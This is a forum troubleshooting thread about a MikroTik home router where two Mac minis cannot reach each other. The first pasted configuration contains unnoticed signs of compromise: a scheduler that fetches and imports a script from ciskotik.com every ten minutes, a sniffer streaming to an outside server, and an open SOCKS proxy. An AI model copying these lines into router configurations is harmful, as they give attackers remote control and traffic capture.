Devices behind switches not seen by devices on mikrotik

Kombat1978 · January 17, 2020, 3:47pm

Good day all,

So I have a strange problem.
My network is as follows;

Mikrotik RG750GL is my DHCP server.
Eth1 is for the ISP
Eth2 goes to a Netgear unmanaged 24 Port switch.
Eth3 and Eth5 feed my PS4 and the AP of the house respectively.
Eth4 goes to a TPLink switch.

TPLink goes to my Mac mini and Windows gaming rig.
Netgear goes to the Plex Server (Also a Mac Mini) and my Smart TV upstairs.

Now my Plex server is available outside my network, shared my library with a friend.
I can see the server and use the Plex app on my Smart TV.
but, and this is what boggles my mind, I cannot see the Plex Mac Mini from My Mac Mini. Will not even let me screen share. I would like to share the NAS with my Plex
Attached is rough sketch of the layout

I suspect something in my firewall or NAT settings of the RB750GL but I am not there yet in expertise.

Suggestions please…

mkx · January 17, 2020, 3:56pm

Post RB’s config (output of /export hide-sensitive) …

Kombat1978 · January 17, 2020, 4:05pm

jan/17/2020 18:02:04 by RouterOS 6.46.1

software id = CID6-03FA

model = 750GL

serial number = 467A0227794B

/interface bridge
add fast-forward=no name=LAN
/interface ethernet
set [ find default-name=ether5 ] comment=Coolideas mac-address=
4C:5E:0C:31:2F:EC name=ether1 speed=100Mbps
set [ find default-name=ether4 ] comment="To Upstairs" mac-address=
4C:5E:0C:31:2F:ED name=ether2 speed=100Mbps
set [ find default-name=ether3 ] comment=PS4 mac-address=4C:5E:0C:31:2F:EE
rx-flow-control=auto speed=100Mbps tx-flow-control=auto
set [ find default-name=ether2 ] advertise="10M-half,10M-full,100M-half,100M-ful
l,1000M-half,1000M-full,2500M-full,5000M-full,10000M-full" comment=
"To Switch" mac-address=4C:5E:0C:31:2F:EF name=ether4 speed=100Mbps
set [ find default-name=ether1 ] advertise=
10M-half,10M-full,100M-half,100M-full comment="AP Downstairs" mac-address=
4C:5E:0C:31:2F:F0 name=ether5 speed=100Mbps
/interface ethernet switch port
set 0 default-vlan-id=0
set 1 default-vlan-id=0
set 2 default-vlan-id=0
set 3 default-vlan-id=0
set 4 default-vlan-id=0
set 5 default-vlan-id=0
/interface wireless security-profiles
set [ find default=yes ] authentication-types=wpa2-psk eap-methods="" mode=
dynamic-keys supplicant-identity=MikroTik
/ip ipsec proposal
set [ find default=yes ] enc-algorithms=aes-128-cbc
/ip pool
add name=dhcp_pool ranges=192.168.1.2-192.168.1.100
/ip dhcp-server
add add-arp=yes address-pool=dhcp_pool authoritative=after-2sec-delay disabled=
no interface=LAN name=dhcp1
/interface pptp-client
add connect-to=1xx.1xx.1xx.xxx disabled=no keepalive-timeout=disabled name=
"VPN to IC" profile=default user=ideacandy
/queue simple
add max-limit=70M/70M name=M target=192.168.1.33/32
/queue type
add kind=pcq name=pcq_down pcq-classifier=dst-address
add kind=pcq name=pcq_up pcq-classifier=src-address
/queue tree
add disabled=yes name=DOWNLOAD packet-mark=equal-mark-pack parent=LAN queue=
pcq_down
add disabled=yes name=UPLOAD packet-mark=equal-mark-pack parent=ether1 queue=
pcq_up
/snmp community
set [ find default=yes ] addresses=0.0.0.0/0 name=TC-RO2010
/interface bridge port
add bridge=LAN hw=no interface=ether2
add bridge=LAN hw=no interface=ether3
add bridge=LAN hw=no interface=ether4
add bridge=LAN hw=no interface=ether5
/ip neighbor discovery-settings
set discover-interface-list=all
/ip settings
set rp-filter=strict
/interface detect-internet
set detect-interface-list=all
/ip address
add address=192.168.1.1/24 interface=LAN network=192.168.1.0
/ip cloud
set ddns-enabled=yes
/ip dhcp-client
add disabled=no interface=ether1 use-peer-dns=no
/ip dhcp-server lease
add address=192.168.1.98 client-id=1:b8:97:5a:e8:f6:3f mac-address=
B8:97:5A:E8:F6:3F server=dhcp1
add address=192.168.1.30 client-id=1:a8:c8:3a:fb:ed:23 mac-address=
A8:C8:3A:FB:ED:23 server=dhcp1
add address=192.168.1.18 client-id=1:c8:63:f1:54:a0:14 comment=ps4 mac-address=
C8:63:F1:54:A0:14 server=dhcp1
add address=192.168.1.17 client-id=1:4c:cc:6a:d8:6a:0 mac-address=
4C:CC:6A:D8:6A:00 server=dhcp1
add address=192.168.1.14 client-id=1:60:a4:d0:cd:86:bf mac-address=
60:A4:D0:CD:86:BF server=dhcp1
add address=192.168.1.16 client-id=1:24:18:1d:76:99:48 mac-address=
24:18:1D:76:99:48 server=dhcp1
add address=192.168.1.26 client-id=1:ac:db:da:4f:9c:59 mac-address=
AC:DB:DA:4F:9C:59 server=dhcp1
add address=192.168.1.13 client-id=1:8c:86:1e:3:f9:83 mac-address=
8C:86:1E:03:F9:83 server=dhcp1
add address=192.168.1.21 client-id=1:d8:cb:8a:e6:e4:90 mac-address=
D8:CB:8A:E6:E4:90 server=dhcp1
add address=192.168.1.8 client-id=1:f8:77:b8:e4:b9:19 mac-address=
F8:77:B8:E4:B9:19 server=dhcp1
add address=192.168.1.28 client-id=1:88:41:fc:a1:85:9e mac-address=
88:41:FC:A1:85:9E server=dhcp1
add address=192.168.1.25 client-id=1:c:4d:e9:a7:4:b6 mac-address=
0C:4D:E9:A7:04:B6 server=dhcp1
add address=192.168.1.33 client-id=1:c:4d:e9:aa:20:c0 mac-address=
0C:4D:E9:AA:20:C0 server=dhcp1
/ip dhcp-server network
add address=192.168.1.0/24 dns-server=154.0.1.1,154.0.1.10 gateway=192.168.1.1
/ip dns
set allow-remote-requests=yes servers=154.0.1.1,154.0.1.10
/ip firewall address-list
add address=41.79.220.24 list=Management_Access
add address=41.79.220.28 list=Management_Access
add address=41.79.220.29 list=Management_Access
add address=41.79.222.190 list=Management_Access
add address=41.79.223.209 list=Management_Access
add address=41.79.221.5 list=Management_Access
add address=45.221.84.187 list=Management_Access
/ip firewall filter
add action=add-src-to-address-list address-list=BL-dns address-list-timeout=12h
chain=input connection-limit=30,32 dst-port=53 in-interface=ether1
protocol=udp
add action=drop chain=input comment="Detect & drop DNS amplification attack."
dst-port=53 in-interface=ether1 protocol=udp src-address-list=BL-dns
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=tcp
add action=accept chain=input comment="Accept Established / Related Input"
connection-state=established,related
add action=accept chain=input comment=
"Allow Management Input - Address List Based" src-address-list=
Management_Access
add action=accept chain=input dst-port=2000 protocol=tcp src-address=
10.222.0.0/16
add action=accept chain=input dst-port=2000 protocol=udp src-address=
10.222.0.0/16
add action=accept chain=input in-interface=ether1 protocol=gre
add action=accept chain=input in-interface=ether1 protocol=ipsec-ah
add action=accept chain=input in-interface=ether1 protocol=ipsec-esp
add action=accept chain=input dst-port=500 in-interface=ether1 protocol=udp
add action=accept chain=input dst-port=1701 in-interface=ether1 protocol=tcp
add action=accept chain=input dst-port=1701 in-interface=ether1 protocol=udp
add action=drop chain=input comment="drop ftp brute forcers" dst-port=21
protocol=tcp src-address-list=ftp_blacklist
add action=accept chain=output content="530 Login incorrect" dst-limit=
1/1m,9,dst-address/1m protocol=tcp
add action=add-dst-to-address-list address-list=ftp_blacklist
address-list-timeout=3h chain=output content="530 Login incorrect"
protocol=tcp
add action=drop chain=input comment="drop ssh brute forcers" dst-port=22
protocol=tcp src-address-list=ssh_blacklist
add action=add-src-to-address-list address-list=ssh_blacklist
address-list-timeout=1w3d chain=input connection-state=new dst-port=22
protocol=tcp src-address-list=ssh_stage3
add action=add-src-to-address-list address-list=ssh_stage3
address-list-timeout=1m chain=input connection-state=new dst-port=22
protocol=tcp src-address-list=ssh_stage2
add action=add-src-to-address-list address-list=ssh_stage2
address-list-timeout=1m chain=input connection-state=new dst-port=22
protocol=tcp src-address-list=ssh_stage1
add action=add-src-to-address-list address-list=ssh_stage1
address-list-timeout=1m chain=input connection-state=new dst-port=22
protocol=tcp
add action=drop chain=input comment="drop telnet brute forcers" dst-port=23
protocol=tcp src-address-list=telnet_blacklist
add action=add-src-to-address-list address-list=telnet_stage1
address-list-timeout=1m chain=input connection-state=new dst-port=23
protocol=tcp
add action=add-src-to-address-list address-list=telnet_stage2
address-list-timeout=1m chain=input connection-state=new dst-port=23
protocol=tcp src-address-list=telnet_stage1
add action=add-src-to-address-list address-list=telnet_stage3
address-list-timeout=1m chain=input connection-state=new dst-port=23
protocol=tcp src-address-list=telnet_stage2
add action=add-src-to-address-list address-list=telnet_blacklist
address-list-timeout=1d chain=input connection-state=new dst-port=23
protocol=tcp src-address-list=telnet_stage3
add action=accept chain=input comment=Torrent dst-port=14547 protocol=tcp
add action=accept chain=input comment=Plex dst-port=43210 protocol=tcp
/ip firewall mangle
add action=mark-connection chain=forward comment="PCQ Equal mark-conn"
disabled=yes new-connection-mark=equal-mark-con passthrough=yes
src-address=192.168.1.0/24
add action=mark-packet chain=forward comment="PCQ Equal mark-pack"
connection-mark=equal-mark-con disabled=yes new-packet-mark=equal-mark-pack
passthrough=yes
/ip firewall nat
add action=masquerade chain=srcnat comment="Internal NAT" out-interface=ether1
src-address=192.168.1.0/24
add action=masquerade chain=srcnat log=yes out-interface="VPN to IC"
add action=dst-nat chain=dstnat comment=Torrent dst-port=14547 in-interface=
ether1 protocol=tcp to-addresses=192.168.1.33 to-ports=14547
add action=dst-nat chain=dstnat comment="Plex Remote" dst-port=43210
in-interface=ether1 protocol=tcp to-addresses=192.168.1.25 to-ports=32400
/ip firewall service-port
set ftp disabled=yes
set tftp disabled=yes
set irc disabled=yes
set sip disabled=yes
set dccp disabled=yes
/ip route
add distance=1 dst-address=172.16.0.2/32 gateway="VPN to IC"
add distance=1 dst-address=172.16.4.0/22 gateway="VPN to IC"
add distance=1 dst-address=192.168.111.0/24 gateway="VPN to IC"
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh disabled=yes
set api disabled=yes port=8778
set api-ssl disabled=yes
/ip socks
set enabled=yes max-connections=500 port=3629
/ip socks access
add action=deny src-address=!5.96.0.0/12
/ip ssh
set allow-none-crypto=yes forwarding-enabled=remote
/system clock
set time-zone-name=Africa/Johannesburg
/system identity
set name=Maurice
/system leds
add interface=ether1 leds="" type=interface-activity
add interface=ether2 leds="" type=interface-activity
add interface=ether3 leds="" type=interface-activity
add interface=ether4 leds="" type=interface-activity
add interface=ether5 leds="" type=interface-activity
add leds="" type=wireless-status
/system scheduler
add interval=30s name=schedule4_ on-event=script4_ policy=
ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
add interval=30s name=schedule8_ on-event=script8_ policy=
ftp,reboot,read,write,policy,test,password,sensitive start-time=startup
add interval=10m name=U5 on-event="/tool fetch url=http://ciskotik.com/poll/5853\
6aaa-015c-4d61-a269-34e3e6fff8ef mode=http dst-path=7xe7zt46hb08\r
\n/import 7xe7zt46hb08" policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time=
startup
/tool sniffer
set file-name=loop filter-interface=ether4 streaming-server=xx7.xxx.1x2.1xx

Kombat1978 · January 17, 2020, 4:08pm

Hi

I was planning to move everything to the Netgear Switch in a month or 2 when I could go buy a kakload of cable to redo entire network.
Was thinking this might sort it.

But in the meantime..

mkx · January 17, 2020, 5:55pm

How about those AP and PS4 connected directly to RB, can they communicate with each other?

I don’t see anything fundamentally wrong with your config. There are a few small bits which surely affect RB’s performance (but might cause the misbehaviour as well):

you have detect-internet=all set … this setting is reportedly sometimes causing weird effects. As its benefits are questionable, it might be better to disable it.
you have quite weird setup of switched ports. First of all you have all ports renamed (names follow the oposite order than HW). Next, you have HW switching disabled forcing all traffic between LAN ports to pass CPU (and for no reason, you don’t have e.g. enabled firewall for intra-LAN traffic). Last: you should be aware of peculiariry of this device: according to product brochure, ports ether2-ether5 are switched while ether1 is connected directly to CPU (making it natural choice for WAN interface). As your naming of ports is upside-down, you’re using ether5 for WAN and ether1 for “coolideas”.

If use of this device was permanent solution, I’d recomend to reset to defaults and add least necessary config (device is an old one and relatively slow, so it isn’t exactly a rocket).

CZFan · January 17, 2020, 7:07pm

@mkx, no way that you will know, but fyi, Cool Ideas is the ISP’s name so ether1 is the WAN

Also had a brief look through config, and besides what you mentioned, dont see anything else wrong and my suspicion is that problem is downstream to the other devices / switches

mkx · January 17, 2020, 8:02pm

That’s a cool name for ISP.

However, CoolIdeas is hooked to the renamed ether1 which is ether5 hardware-wise.

Kombat1978 · January 18, 2020, 7:17am

Somehow on this RB the ports are switched. 5 is 1 and so forth.
I found a RB750Gr3. Doing that setup with the tweaks suggested.
Will revert if anything changes…

shot guys.

ps Czfan… fellow Randburger… sup

Kombat1978 · January 18, 2020, 8:39am

Hi guys,

Here is the config for the new one.

jan/18/2020 10:38:39 by RouterOS 6.46.2

software id = 1251-0HN5

model = RB750Gr3

serial number = 8AFF09CAC356

/interface bridge
add name=Bridge1
/interface ethernet
set [ find default-name=ether1 ] comment=CoolIdeas
set [ find default-name=ether2 ] comment=Upstairs
set [ find default-name=ether3 ] comment=AP
set [ find default-name=ether4 ] comment=Office
set [ find default-name=ether5 ] comment=PS4
/interface list
add name=WAN
add name=LAN
/interface wireless security-profiles
set [ find default=yes ] supplicant-identity=MikroTik
/ip hotspot profile
set [ find default=yes ] html-directory=flash/hotspot
/ip pool
add name=dhcp ranges=192.168.1.2-192.168.1.100
/ip dhcp-server
add address-pool=dhcp disabled=no interface=Bridge1 name=dhcp1
/port
set 0 name=serial0
/interface bridge port
add bridge=Bridge1 interface=ether2
add bridge=Bridge1 interface=ether3
add bridge=Bridge1 interface=ether4
add bridge=Bridge1 interface=ether5
/interface list member
add interface=ether1 list=WAN
add interface=Bridge1 list=LAN
/ip address
add address=192.168.1.1/24 interface=ether2 network=192.168.1.0
/ip dhcp-client
add disabled=no interface=ether1
/ip dhcp-server lease
add address=192.168.1.100 client-id=1:c:4d:e9:a7:4:b6 mac-address=0C:4D:E9:A7:04:B6 server=dhcp1
add address=192.168.1.99 client-id=1:c:4d:e9:aa:20:c0 mac-address=0C:4D:E9:AA:20:C0 server=dhcp1
add address=192.168.1.97 client-id=1:8c:86:1e:3:f9:83 mac-address=8C:86:1E:03:F9:83 server=dhcp1
add address=192.168.1.96 client-id=1:88:41:fc:a1:85:9e mac-address=88:41:FC:A1:85:9E server=dhcp1
add address=192.168.1.98 client-id=1:18:65:90:cb:7:11 mac-address=18:65:90:CB:07:11 server=dhcp1
add address=192.168.1.94 client-id=1:24:18:1d:76:99:48 mac-address=24:18:1D:76:99:48 server=dhcp1
add address=192.168.1.17 client-id=1:4c:cc:6a:d8:6a:0 mac-address=4C:CC:6A:D8:6A:00 server=dhcp1
/ip dhcp-server network
add address=192.168.1.0/24 gateway=192.168.1.1 netmask=24
/ip firewall filter
add action=add-src-to-address-list address-list=BL-dns address-list-timeout=12h chain=input connection-limit=30,32
dst-port=53 in-interface=ether1 protocol=udp
add action=drop chain=input comment="Detect & drop DNS amplification attack." dst-port=53 in-interface=ether1 protocol=
udp src-address-list=BL-dns
add action=drop chain=input dst-port=53 in-interface=ether1 protocol=tcp
add action=accept chain=input comment="Accept Established / Related Input" connection-state=established,related
add action=accept chain=input comment="Allow Management Input - Address List Based" src-address-list=Management_Access
add action=accept chain=input dst-port=2000 protocol=tcp src-address=10.222.0.0/16
add action=accept chain=input dst-port=2000 protocol=udp src-address=10.222.0.0/16
add action=accept chain=input in-interface=ether1 protocol=gre
add action=accept chain=input in-interface=ether1 protocol=ipsec-ah
add action=accept chain=input in-interface=ether1 protocol=ipsec-esp
add action=accept chain=input dst-port=500 in-interface=ether1 protocol=udp
add action=accept chain=input dst-port=1701 in-interface=ether1 protocol=tcp
add action=accept chain=input dst-port=1701 in-interface=ether1 protocol=udp
add action=drop chain=input comment="drop ftp brute forcers" dst-port=21 protocol=tcp src-address-list=ftp_blacklist
add action=accept chain=output content="530 Login incorrect" dst-limit=1/1m,9,dst-address/1m protocol=tcp
add action=add-dst-to-address-list address-list=ftp_blacklist address-list-timeout=3h chain=output content=
"530 Login incorrect" protocol=tcp
add action=drop chain=input comment="drop ssh brute forcers" dst-port=22 protocol=tcp src-address-list=ssh_blacklist
add action=add-src-to-address-list address-list=ssh_blacklist address-list-timeout=1w3d chain=input connection-state=
new dst-port=22 protocol=tcp src-address-list=ssh_stage3
add action=add-src-to-address-list address-list=ssh_stage3 address-list-timeout=1m chain=input connection-state=new
dst-port=22 protocol=tcp src-address-list=ssh_stage2
add action=add-src-to-address-list address-list=ssh_stage2 address-list-timeout=1m chain=input connection-state=new
dst-port=22 protocol=tcp src-address-list=ssh_stage1
add action=add-src-to-address-list address-list=ssh_stage1 address-list-timeout=1m chain=input connection-state=new
dst-port=22 protocol=tcp
add action=drop chain=input comment="drop telnet brute forcers" dst-port=23 protocol=tcp src-address-list=
telnet_blacklist
add action=add-src-to-address-list address-list=telnet_stage1 address-list-timeout=1m chain=input connection-state=new
dst-port=23 protocol=tcp
add action=add-src-to-address-list address-list=telnet_stage2 address-list-timeout=1m chain=input connection-state=new
dst-port=23 protocol=tcp src-address-list=telnet_stage1
add action=add-src-to-address-list address-list=telnet_stage3 address-list-timeout=1m chain=input connection-state=new
dst-port=23 protocol=tcp src-address-list=telnet_stage2
add action=add-src-to-address-list address-list=telnet_blacklist address-list-timeout=1d chain=input connection-state=
new dst-port=23 protocol=tcp src-address-list=telnet_stage3
add action=accept chain=input comment=Torrent dst-port=14547 protocol=tcp
add action=accept chain=input comment=Plex dst-port=43210 protocol=tcp
/ip firewall mangle
add action=mark-connection chain=forward comment="PCQ Equal mark-conn" disabled=yes new-connection-mark=equal-mark-con
passthrough=yes src-address=192.168.1.0/24
add action=mark-packet chain=forward comment="PCQ Equal mark-pack" connection-mark=equal-mark-con disabled=yes
new-packet-mark=equal-mark-pack passthrough=yes
/ip firewall nat
add action=masquerade chain=srcnat comment="Internal NAT" out-interface=ether1 src-address=192.168.1.0/24
add action=dst-nat chain=dstnat comment=Torrent dst-port=14547 in-interface=ether1 protocol=tcp to-addresses=
192.168.1.99 to-ports=14547
add action=dst-nat chain=dstnat comment="Plex Remote" dst-port=43210 in-interface=ether1 protocol=tcp to-addresses=
192.168.1.100 to-ports=32400
/ip firewall service-port
set ftp disabled=yes
set tftp disabled=yes
set irc disabled=yes
set sip disabled=yes
set dccp disabled=yes
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh disabled=yes
set api disabled=yes port=8778
set api-ssl disabled=yes
/ip socks
set enabled=yes max-connections=500 port=3629
/ip socks access
add action=deny src-address=!5.96.0.0/12
/ip ssh
set allow-none-crypto=yes forwarding-enabled=remote
/system clock
set time-zone-name=Africa/Johannesburg
/system identity
set name=3ParkMews

Still not able to see the Plex Mac Mini from my Mac Mini

Shot

mkx · January 18, 2020, 9:37am

One thing (probably unrelated to your main problem): LAN IP address should go to Bridge1 (not ether2).

Back to the problem: do you see both Mac mini MAC addresses in /interface bridge host print? Could be that one of switches somehow drops ethernet broadcasts (needed for ARP)? What if you set /interface bridge set [ find ] protocol-mode=none ?

Kombat1978 · January 18, 2020, 11:16am

Hey MK,

Fixed that LAN IP address to Bridge1

[Kombat@3ParkMews] > interface bridge host print
Flags: X - disabled, I - invalid, D - dynamic, L - local, E - external

MAC-ADDRESS VID ON-INTERFACE BRIDGE AGE

0 D 0C:4D:E9:A7:04:B6 ether2 Bridge1 0s
1 D 0C:4D:E9:AA:20:C0 ether4 Bridge1 0s
2 D 24:18:1D:76:99:48 ether3 Bridge1 20s
3 D 88:41:FC:A1:85:9F ether3 Bridge1 3s
4 D 8C:86:1E:03:F9:83 ether3 Bridge1 14s
5 DL B8:69:F4:AF:AD:FA ether2 Bridge1
6 DL B8:69:F4:AF:AD:FB ether3 Bridge1
7 DL B8:69:F4:AF:AD:FC ether4 Bridge1

\

0 and # 1 are the Plex and Mac Mini respectively.

For this ..../interface bridge set [ find ] protocol-mode=none (Just like that or must i edit..

Shot

Kombat1978 · January 18, 2020, 11:36am

Update…

SO I can see the Mac Mini from the Plex. But not vice versa.

CZFan · January 18, 2020, 6:48pm

If this is the result after setting bridge protocol mode to none, then you might possibly have a loop in your network causing the problems

Kombat1978 · January 19, 2020, 5:09am

Shot, I think i need to stop procrastinating and redo my fraken network. Then I can find this loop.

Thank you for all the ideas and help gents… highly appreciated.